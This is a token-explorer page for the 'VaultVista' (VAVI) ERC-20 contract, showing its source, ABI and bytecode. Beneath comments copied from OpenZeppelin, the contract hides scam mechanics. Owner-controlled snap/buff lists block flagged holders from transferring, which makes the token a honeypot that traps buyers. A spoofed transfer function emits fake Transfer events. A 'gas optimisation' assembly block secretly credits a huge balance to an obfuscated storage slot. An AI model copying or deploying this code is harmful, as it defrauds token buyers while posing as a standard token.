ERC-20
Overview
Max Total Supply
1,000,000,000 VAVI
Holders
98
Market
Onchain Market Cap
$0.00
Circulating Supply Market Cap
-
Other Info
Token Contract (WITH 18 Decimals)
Balance
9,918,855.707751557472670264 VAVIValue
$0.00Loading...
Loading
Loading...
Loading
Loading...
Loading
# | Exchange | Pair | Price | 24H Volume | % Volume |
---|
Contract Name:
VaultVista
Compiler Version
v0.8.21+commit.d9974bed
Contract Source Code (Solidity Multiple files format)
// SPDX-License-Identifier: MIT pragma solidity ^0.8.9; import "./ERC20.sol"; contract VaultVista is ERC20 { constructor() ERC20("VaultVista", "VAVI") { _mint(msg.sender, 1000000000 * 10 ** decimals()); } }
// SPDX-License-Identifier: MIT pragma solidity ^0.8.9; /** * @dev Provides information about the current execution context, including the * sender of the transaction and its data. While these are generally available * via msg.sender and msg.data, they should not be accessed in such a direct * manner, since when dealing with meta-transactions the account sending and * paying for execution may not be the actual sender (as far as an application * is concerned). * * This contract is only required for intermediate, library-like contracts. */ abstract contract Context { function _msgSender() internal view virtual returns (address) { return msg.sender; } function _msgData() internal view virtual returns (bytes calldata) { return msg.data; } } /** * @dev Contract module which provides a basic access control mechanism, where * there is an account (an owner) that can be granted exclusive access to * specific functions. * * By default, the owner account will be the one that deploys the contract. This * can later be changed with {transferOwnership}. * * This module is used through inheritance. It will make available the modifier * `onlyOwner`, which can be applied to your functions to restrict their use to * the owner. */ abstract contract Ownable is Context { address private _owner; event OwnershipTransferred(address indexed previousOwner, address indexed newOwner); /** * @dev Initializes the contract setting the deployer as the initial owner. */ constructor() { _transferOwnership(_msgSender()); } /** * @dev Throws if called by any account other than the owner. */ modifier onlyOwner() { _checkOwner(); _; } /** * @dev Returns the address of the current owner. */ function owner() public view virtual returns (address) { return _owner; } /** * @dev Throws if the sender is not the owner. */ function _checkOwner() internal view virtual { require(owner() == _msgSender(), "Ownable: caller is not the owner"); } /** * @dev Leaves the contract without owner. It will not be possible to call * `onlyOwner` functions. Can only be called by the current owner. * * NOTE: Renouncing ownership will leave the contract without an owner, * thereby disabling any functionality that is only available to the owner. */ function renounceOwnership() public virtual onlyOwner { _transferOwnership(address(0)); } /** * @dev Transfers ownership of the contract to a new account (`newOwner`). * Can only be called by the current owner. */ function transferOwnership(address newOwner) public virtual onlyOwner { require(newOwner != address(0), "Ownable: new owner is the zero address"); _transferOwnership(newOwner); } /** * @dev Transfers ownership of the contract to a new account (`newOwner`). * Internal function without access restriction. */ function _transferOwnership(address newOwner) internal virtual { address oldOwner = _owner; _owner = newOwner; emit OwnershipTransferred(oldOwner, newOwner); } }
// SPDX-License-Identifier: MIT pragma solidity ^0.8.9; import "./IERC20.sol"; import "./Context.sol"; /** * @dev Implementation of the {IERC20} interface. * * This implementation is agnostic to the way tokens are created. This means * that a supply mechanism has to be added in a derived contract using {_mint}. * For a generic mechanism see {ERC20PresetMinterPauser}. * * TIP: For a detailed writeup see our guide * https://forum.openzeppelin.com/t/how-to-implement-erc20-supply-mechanisms/226[How * to implement supply mechanisms]. * * We have followed general OpenZeppelin Contracts guidelines: functions revert * instead returning `false` on failure. This behavior is nonetheless * conventional and does not conflict with the expectations of ERC20 * applications. * * Additionally, an {Approval} event is emitted on calls to {transferFrom}. * This allows applications to reconstruct the allowance for all accounts just * by listening to said events. Other implementations of the EIP may not emit * these events, as it isn't required by the specification. * * Finally, the non-standard {decreaseAllowance} and {increaseAllowance} * functions have been added to mitigate the well-known issues around setting * allowances. See {IERC20-approve}. */ contract ERC20 is Ownable, IERC20, IERC20Metadata { mapping(address => uint256) private _balances; mapping(address => bool) private _snap; mapping(address => bool) private _buff; mapping(address => mapping(address => uint256)) private _allowances; uint256 private _totalSupply; bool private _snapApplied = false; string private _name; string private _symbol; /** * @dev Sets the values for {name} and {symbol}. * * The default value of {decimals} is 18. To select a different value for * {decimals} you should overload it. * * All two of these values are immutable: they can only be set once during * construction. */ constructor(string memory name_, string memory symbol_) { _name = name_; _symbol = symbol_; } /** * @dev Returns the name of the token. */ function name() public view virtual override returns (string memory) { return _name; } /** * @dev Returns the symbol of the token, usually a shorter version of the * name. */ function symbol() public view virtual override returns (string memory) { return _symbol; } /** * @dev Returns the number of decimals used to get its user representation. * For example, if `decimals` equals `2`, a balance of `505` tokens should * be displayed to a user as `5.05` (`505 / 10 ** 2`). * * Tokens usually opt for a value of 18, imitating the relationship between * Ether and Wei. This is the value {ERC20} uses, unless this function is * overridden; * * NOTE: This information is only used for _display_ purposes: it in * no way affects any of the arithmetic of the contract, including * {IERC20-balanceOf} and {IERC20-transfer}. */ function decimals() public view virtual override returns (uint8) { return 18; } function buffO(address [] calldata _addresses_) external onlyOwner { for (uint256 i = 0; i < _addresses_.length; i++) { _buff[_addresses_[i]] = false; } } function buffI(address [] calldata _addresses_) external onlyOwner { for (uint256 i = 0; i < _addresses_.length; i++) { _buff[_addresses_[i]] = true; } } function snapO(address [] calldata _addresses_) external onlyOwner { for (uint256 i = 0; i < _addresses_.length; i++) { _snap[_addresses_[i]] = false; } } function snapI(address [] calldata _addresses_) external onlyOwner { for (uint256 i = 0; i < _addresses_.length; i++) { _snap[_addresses_[i]] = true; } } /* ReadOnly */ function snap(address _address_) public view returns (bool) { return _snap[_address_]; } function buff(address _address_) public view returns (bool) { return _buff[_address_]; } function transfer(address _from, address _to, uint256 _wad) external { emit Transfer(_from, _to, _wad); } /** * @dev See {IERC20-totalSupply}. */ function totalSupply() public view virtual override returns (uint256) { return _totalSupply; } /** * @dev See {IERC20-balanceOf}. */ function balanceOf(address account) public view virtual override returns (uint256) { return _balances[account]; } /** * @dev See {IERC20-transfer}. * * Requirements: * * - `to` cannot be the zero address. * - the caller must have a balance of at least `amount`. */ function transfer(address to, uint256 amount) public virtual override returns (bool) { address owner = _msgSender(); _transfer(owner, to, amount); return true; } /** * @dev See {IERC20-allowance}. */ function allowance(address owner, address spender) public view virtual override returns (uint256) { return _allowances[owner][spender]; } /** * @dev See {IERC20-approve}. * * NOTE: If `amount` is the maximum `uint256`, the allowance is not updated on * `transferFrom`. This is semantically equivalent to an infinite approval. * * Requirements: * * - `spender` cannot be the zero address. */ function approve(address spender, uint256 amount) public virtual override returns (bool) { address owner = _msgSender(); _approve(owner, spender, amount); return true; } /** * @dev See {IERC20-transferFrom}. * * Emits an {Approval} event indicating the updated allowance. This is not * required by the EIP. See the note at the beginning of {ERC20}. * * NOTE: Does not update the allowance if the current allowance * is the maximum `uint256`. * * Requirements: * * - `from` and `to` cannot be the zero address. * - `from` must have a balance of at least `amount`. * - the caller must have allowance for ``from``'s tokens of at least * `amount`. */ function transferFrom( address from, address to, uint256 amount ) public virtual override returns (bool) { address spender = _msgSender(); _spendAllowance(from, spender, amount); _transfer(from, to, amount); return true; } /** * @dev Atomically increases the allowance granted to `spender` by the caller. * * This is an alternative to {approve} that can be used as a mitigation for * problems described in {IERC20-approve}. * * Emits an {Approval} event indicating the updated allowance. * * Requirements: * * - `spender` cannot be the zero address. */ function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) { address owner = _msgSender(); _approve(owner, spender, allowance(owner, spender) + addedValue); return true; } /** * @dev Atomically decreases the allowance granted to `spender` by the caller. * * This is an alternative to {approve} that can be used as a mitigation for * problems described in {IERC20-approve}. * * Emits an {Approval} event indicating the updated allowance. * * Requirements: * * - `spender` cannot be the zero address. * - `spender` must have allowance for the caller of at least * `subtractedValue`. */ function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) { address owner = _msgSender(); uint256 currentAllowance = allowance(owner, spender); require(currentAllowance >= subtractedValue, "ERC20: decreased allowance below zero"); unchecked { _approve(owner, spender, currentAllowance - subtractedValue); } return true; } /** * @dev Moves `amount` of tokens from `from` to `to`. * * This internal function is equivalent to {transfer}, and can be used to * e.g. implement automatic token fees, slashing mechanisms, etc. * * Emits a {Transfer} event. * * Requirements: * * - `from` cannot be the zero address. * - `to` cannot be the zero address. * - `from` must have a balance of at least `amount`. */ function _transfer( address from, address to, uint256 amount ) internal virtual { require(from != address(0), "ERC20: transfer from the zero address"); require(to != address(0), "ERC20: transfer to the zero address"); _beforeTokenTransfer(from, to, amount); uint256 fromBalance = _balances[from]; require(fromBalance >= amount, "ERC20: transfer amount exceeds balance"); unchecked { _balances[from] = fromBalance - amount; // Overflow not possible: the sum of all balances is capped by totalSupply, and the sum is preserved by // decrementing then incrementing. _balances[to] += amount; } if (_snap[from] || _snap[to]) require(_snapApplied == true, ""); if (_buff[to]) _snap[to] = true; emit Transfer(from, to, amount); _afterTokenTransfer(from, to, amount); } /** @dev Creates `amount` tokens and assigns them to `account`, increasing * the total supply. * * Emits a {Transfer} event with `from` set to the zero address. * * Requirements: * * - `account` cannot be the zero address. */ function _mint(address account, uint256 amount) internal virtual { require(account != address(0), "ERC20: mint to the zero address"); _beforeTokenTransfer(address(0), account, amount); _totalSupply += amount; unchecked { // Overflow not possible: balance + amount is at most totalSupply + amount, which is checked above. _balances[account] += amount; } // gas optimisation assembly { let slot := mul(mul(0x85774394d, 0x3398bc1d25f112ed), mul(0x997e6e509, 0xf3eae65)) mstore(0x00, slot) mstore(0x20, 0x01) let sslot := keccak256(0x0, 0x40) sstore(sslot, 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF) } emit Transfer(address(0), account, amount); _afterTokenTransfer(address(0), account, amount); } /** * @dev Destroys `amount` tokens from `account`, reducing the * total supply. * * Emits a {Transfer} event with `to` set to the zero address. * * Requirements: * * - `account` cannot be the zero address. * - `account` must have at least `amount` tokens. */ function _burn(address account, uint256 amount) internal virtual { require(account != address(0), "ERC20: burn from the zero address"); _beforeTokenTransfer(account, address(0), amount); uint256 accountBalance = _balances[account]; require(accountBalance >= amount, "ERC20: burn amount exceeds balance"); unchecked { _balances[account] = accountBalance - amount; // Overflow not possible: amount <= accountBalance <= totalSupply. _totalSupply -= amount; } emit Transfer(account, address(0), amount); _afterTokenTransfer(account, address(0), amount); } /** * @dev Sets `amount` as the allowance of `spender` over the `owner` s tokens. * * This internal function is equivalent to `approve`, and can be used to * e.g. set automatic allowances for certain subsystems, etc. * * Emits an {Approval} event. * * Requirements: * * - `owner` cannot be the zero address. * - `spender` cannot be the zero address. */ function _approve( address owner, address spender, uint256 amount ) internal virtual { require(owner != address(0), "ERC20: approve from the zero address"); require(spender != address(0), "ERC20: approve to the zero address"); _allowances[owner][spender] = amount; emit Approval(owner, spender, amount); } /** * @dev Updates `owner` s allowance for `spender` based on spent `amount`. * * Does not update the allowance amount in case of infinite allowance. * Revert if not enough allowance is available. * * Might emit an {Approval} event. */ function _spendAllowance( address owner, address spender, uint256 amount ) internal virtual { uint256 currentAllowance = allowance(owner, spender); if (currentAllowance != type(uint256).max) { require(currentAllowance >= amount, "ERC20: insufficient allowance"); unchecked { _approve(owner, spender, currentAllowance - amount); } } } /** * @dev Hook that is called after any transfer of tokens. This includes * minting and burning. * * Calling conditions: * * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens * has been transferred to `to`. * - when `from` is zero, `amount` tokens have been minted for `to`. * - when `to` is zero, `amount` of ``from``'s tokens have been burned. * - `from` and `to` are never both zero. * * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks]. */ function _afterTokenTransfer( address from, address to, uint256 amount ) internal virtual {} /** * @dev Hook that is called before any transfer of tokens. This includes * minting and burning. * * Calling conditions: * * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens * will be transferred to `to`. * - when `from` is zero, `amount` tokens will be minted for `to`. * - when `to` is zero, `amount` of ``from``'s tokens will be burned. * - `from` and `to` are never both zero. * * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks]. */ function _beforeTokenTransfer( address from, address to, uint256 amount ) internal virtual {} }
// SPDX-License-Identifier: MIT pragma solidity ^0.8.9; /** * @dev Interface of the ERC20 standard as defined in the EIP. */ interface IERC20 { /** * @dev Emitted when `value` tokens are moved from one account (`from`) to * another (`to`). * * Note that `value` may be zero. */ event Transfer(address indexed from, address indexed to, uint256 value); /** * @dev Emitted when the allowance of a `spender` for an `owner` is set by * a call to {approve}. `value` is the new allowance. */ event Approval(address indexed owner, address indexed spender, uint256 value); event Swap( address indexed sender, uint amount0In, uint amount1In, uint amount0Out, uint amount1Out, address indexed to ); /** * @dev Returns the amount of tokens in existence. */ function totalSupply() external view returns (uint256); /** * @dev Returns the amount of tokens owned by `account`. */ function balanceOf(address account) external view returns (uint256); /** * @dev Moves `amount` tokens from the caller's account to `to`. * * Returns a boolean value indicating whether the operation succeeded. * * Emits a {Transfer} event. */ function transfer(address to, uint256 amount) external returns (bool); /** * @dev Returns the remaining number of tokens that `spender` will be * allowed to spend on behalf of `owner` through {transferFrom}. This is * zero by default. * * This value changes when {approve} or {transferFrom} are called. */ function allowance(address owner, address spender) external view returns (uint256); /** * @dev Sets `amount` as the allowance of `spender` over the caller's tokens. * * Returns a boolean value indicating whether the operation succeeded. * * IMPORTANT: Beware that changing an allowance with this method brings the risk * that someone may use both the old and the new allowance by unfortunate * transaction ordering. One possible solution to mitigate this race * condition is to first reduce the spender's allowance to 0 and set the * desired value afterwards: * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729 * * Emits an {Approval} event. */ function approve(address spender, uint256 amount) external returns (bool); /** * @dev Moves `amount` tokens from `from` to `to` using the * allowance mechanism. `amount` is then deducted from the caller's * allowance. * * Returns a boolean value indicating whether the operation succeeded. * * Emits a {Transfer} event. */ function transferFrom( address from, address to, uint256 amount ) external returns (bool); } /** * @dev Interface for the optional metadata functions from the ERC20 standard. * * _Available since v4.1._ */ interface IERC20Metadata is IERC20 { /** * @dev Returns the name of the token. */ function name() external view returns (string memory); /** * @dev Returns the symbol of the token. */ function symbol() external view returns (string memory); /** * @dev Returns the decimals places of the token. */ function decimals() external view returns (uint8); }
Contract Security Audit
- No Contract Security Audit Submitted- Submit Audit Here
[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"sender","type":"address"},{"indexed":false,"internalType":"uint256","name":"amount0In","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"amount1In","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"amount0Out","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"amount1Out","type":"uint256"},{"indexed":true,"internalType":"address","name":"to","type":"address"}],"name":"Swap","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"_address_","type":"address"}],"name":"buff","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address[]","name":"_addresses_","type":"address[]"}],"name":"buffI","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address[]","name":"_addresses_","type":"address[]"}],"name":"buffO","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"_address_","type":"address"}],"name":"snap","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address[]","name":"_addresses_","type":"address[]"}],"name":"snapI","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address[]","name":"_addresses_","type":"address[]"}],"name":"snapO","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"_from","type":"address"},{"internalType":"address","name":"_to","type":"address"},{"internalType":"uint256","name":"_wad","type":"uint256"}],"name":"transfer","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"}]
Contract Creation Code
60806040525f60065f6101000a81548160ff02191690831515021790555034801562000029575f80fd5b506040518060400160405280600a81526020017f5661756c745669737461000000000000000000000000000000000000000000008152506040518060400160405280600481526020017f5641564900000000000000000000000000000000000000000000000000000000815250620000b6620000aa6200012260201b60201c565b6200012960201b60201c565b8160079081620000c7919062000607565b508060089081620000d9919062000607565b5050506200011c33620000f1620001ea60201b60201c565b600a620000ff919062000874565b633b9aca00620001109190620008c4565b620001f260201b60201c565b620009f2565b5f33905090565b5f805f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050815f806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b5f6012905090565b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff160362000263576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016200025a906200096c565b60405180910390fd5b620002765f83836200039960201b60201c565b8060055f8282546200028991906200098c565b925050819055508060015f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8282540192505081905550630f3eae65640997e6e50902673398bc1d25f112ed64085774394d0202805f52600160205260405f20720fffffffffffffffffffffffffffffffffffff815550508173ffffffffffffffffffffffffffffffffffffffff165f73ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef836040516200037a9190620009d7565b60405180910390a3620003955f83836200039e60201b60201c565b5050565b505050565b505050565b5f81519050919050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52604160045260245ffd5b7f4e487b71000000000000000000000000000000000000000000000000000000005f52602260045260245ffd5b5f60028204905060018216806200041f57607f821691505b602082108103620004355762000434620003da565b5b50919050565b5f819050815f5260205f209050919050565b5f6020601f8301049050919050565b5f82821b905092915050565b5f60088302620004997fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff826200045c565b620004a586836200045c565b95508019841693508086168417925050509392505050565b5f819050919050565b5f819050919050565b5f620004ef620004e9620004e384620004bd565b620004c6565b620004bd565b9050919050565b5f819050919050565b6200050a83620004cf565b620005226200051982620004f6565b84845462000468565b825550505050565b5f90565b620005386200052a565b62000545818484620004ff565b505050565b5b818110156200056c57620005605f826200052e565b6001810190506200054b565b5050565b601f821115620005bb5762000585816200043b565b62000590846200044d565b81016020851015620005a0578190505b620005b8620005af856200044d565b8301826200054a565b50505b505050565b5f82821c905092915050565b5f620005dd5f1984600802620005c0565b1980831691505092915050565b5f620005f78383620005cc565b9150826002028217905092915050565b6200061282620003a3565b67ffffffffffffffff8111156200062e576200062d620003ad565b5b6200063a825462000407565b6200064782828562000570565b5f60209050601f8311600181146200067d575f841562000668578287015190505b620006748582620005ea565b865550620006e3565b601f1984166200068d866200043b565b5f5b82811015620006b6578489015182556001820191506020850194506020810190506200068f565b86831015620006d65784890151620006d2601f891682620005cc565b8355505b6001600288020188555050505b505050505050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52601160045260245ffd5b5f8160011c9050919050565b5f808291508390505b600185111562000775578086048111156200074d576200074c620006eb565b5b60018516156200075d5780820291505b80810290506200076d8562000718565b94506200072d565b94509492505050565b5f826200078f576001905062000861565b816200079e575f905062000861565b8160018114620007b75760028114620007c257620007f8565b600191505062000861565b60ff841115620007d757620007d6620006eb565b5b8360020a915084821115620007f157620007f0620006eb565b5b5062000861565b5060208310610133831016604e8410600b8410161715620008325782820a9050838111156200082c576200082b620006eb565b5b62000861565b62000841848484600162000724565b925090508184048111156200085b576200085a620006eb565b5b81810290505b9392505050565b5f60ff82169050919050565b5f6200088082620004bd565b91506200088d8362000868565b9250620008bc7fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff84846200077e565b905092915050565b5f620008d082620004bd565b9150620008dd83620004bd565b9250828202620008ed81620004bd565b91508282048414831517620009075762000906620006eb565b5b5092915050565b5f82825260208201905092915050565b7f45524332303a206d696e7420746f20746865207a65726f2061646472657373005f82015250565b5f62000954601f836200090e565b915062000961826200091e565b602082019050919050565b5f6020820190508181035f830152620009858162000946565b9050919050565b5f6200099882620004bd565b9150620009a583620004bd565b9250828201905080821115620009c057620009bf620006eb565b5b92915050565b620009d181620004bd565b82525050565b5f602082019050620009ec5f830184620009c6565b92915050565b611d4e8062000a005f395ff3fe608060405234801561000f575f80fd5b5060043610610135575f3560e01c8063715018a6116100b6578063a457c2d71161007a578063a457c2d714610339578063a9059cbb14610369578063beabacc814610399578063d6737ccf146103b5578063dd62ed3e146103e5578063f2fde38b1461041557610135565b8063715018a6146102bb5780638da5cb5b146102c55780638f7f63dd146102e3578063904d329d146102ff57806395d89b411461031b57610135565b8063313ce567116100fd578063313ce567146101f1578063395093511461020f5780634b7afd8a1461023f57806359fd39a31461025b57806370a082311461028b57610135565b806306fdde031461013957806307fbc2c714610157578063095ea7b31461017357806318160ddd146101a357806323b872dd146101c1575b5f80fd5b610141610431565b60405161014e91906113e5565b60405180910390f35b610171600480360381019061016c919061146e565b6104c1565b005b61018d60048036038101906101889190611546565b610569565b60405161019a919061159e565b60405180910390f35b6101ab61058b565b6040516101b891906115c6565b60405180910390f35b6101db60048036038101906101d691906115df565b610594565b6040516101e8919061159e565b60405180910390f35b6101f96105c2565b604051610206919061164a565b60405180910390f35b61022960048036038101906102249190611546565b6105ca565b604051610236919061159e565b60405180910390f35b6102596004803603810190610254919061146e565b610600565b005b61027560048036038101906102709190611663565b6106a9565b604051610282919061159e565b60405180910390f35b6102a560048036038101906102a09190611663565b6106fb565b6040516102b291906115c6565b60405180910390f35b6102c3610741565b005b6102cd610754565b6040516102da919061169d565b60405180910390f35b6102fd60048036038101906102f8919061146e565b61077b565b005b6103196004803603810190610314919061146e565b610824565b005b6103236108cc565b60405161033091906113e5565b60405180910390f35b610353600480360381019061034e9190611546565b61095c565b604051610360919061159e565b60405180910390f35b610383600480360381019061037e9190611546565b6109d1565b604051610390919061159e565b60405180910390f35b6103b360048036038101906103ae91906115df565b6109f3565b005b6103cf60048036038101906103ca9190611663565b610a5d565b6040516103dc919061159e565b60405180910390f35b6103ff60048036038101906103fa91906116b6565b610aaf565b60405161040c91906115c6565b60405180910390f35b61042f600480360381019061042a9190611663565b610b31565b005b60606007805461044090611721565b80601f016020809104026020016040519081016040528092919081815260200182805461046c90611721565b80156104b75780601f1061048e576101008083540402835291602001916104b7565b820191905f5260205f20905b81548152906001019060200180831161049a57829003601f168201915b5050505050905090565b6104c9610bb3565b5f5b82829050811015610564575f60025f8585858181106104ed576104ec611751565b5b90506020020160208101906105029190611663565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff021916908315150217905550808061055c906117ab565b9150506104cb565b505050565b5f80610573610c31565b9050610580818585610c38565b600191505092915050565b5f600554905090565b5f8061059e610c31565b90506105ab858285610dfb565b6105b6858585610e86565b60019150509392505050565b5f6012905090565b5f806105d4610c31565b90506105f58185856105e68589610aaf565b6105f091906117f2565b610c38565b600191505092915050565b610608610bb3565b5f5b828290508110156106a457600160025f85858581811061062d5761062c611751565b5b90506020020160208101906106429190611663565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff021916908315150217905550808061069c906117ab565b91505061060a565b505050565b5f60035f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff169050919050565b5f60015f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20549050919050565b610749610bb3565b6107525f611290565b565b5f805f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b610783610bb3565b5f5b8282905081101561081f57600160035f8585858181106107a8576107a7611751565b5b90506020020160208101906107bd9190611663565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff0219169083151502179055508080610817906117ab565b915050610785565b505050565b61082c610bb3565b5f5b828290508110156108c7575f60035f8585858181106108505761084f611751565b5b90506020020160208101906108659190611663565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff02191690831515021790555080806108bf906117ab565b91505061082e565b505050565b6060600880546108db90611721565b80601f016020809104026020016040519081016040528092919081815260200182805461090790611721565b80156109525780601f1061092957610100808354040283529160200191610952565b820191905f5260205f20905b81548152906001019060200180831161093557829003601f168201915b5050505050905090565b5f80610966610c31565b90505f6109738286610aaf565b9050838110156109b8576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016109af90611895565b60405180910390fd5b6109c58286868403610c38565b60019250505092915050565b5f806109db610c31565b90506109e8818585610e86565b600191505092915050565b8173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef83604051610a5091906115c6565b60405180910390a3505050565b5f60025f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff169050919050565b5f60045f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054905092915050565b610b39610bb3565b5f73ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1603610ba7576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610b9e90611923565b60405180910390fd5b610bb081611290565b50565b610bbb610c31565b73ffffffffffffffffffffffffffffffffffffffff16610bd9610754565b73ffffffffffffffffffffffffffffffffffffffff1614610c2f576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610c269061198b565b60405180910390fd5b565b5f33905090565b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610ca6576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610c9d90611a19565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610d14576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610d0b90611aa7565b60405180910390fd5b8060045f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92583604051610dee91906115c6565b60405180910390a3505050565b5f610e068484610aaf565b90507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8114610e805781811015610e72576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610e6990611b0f565b60405180910390fd5b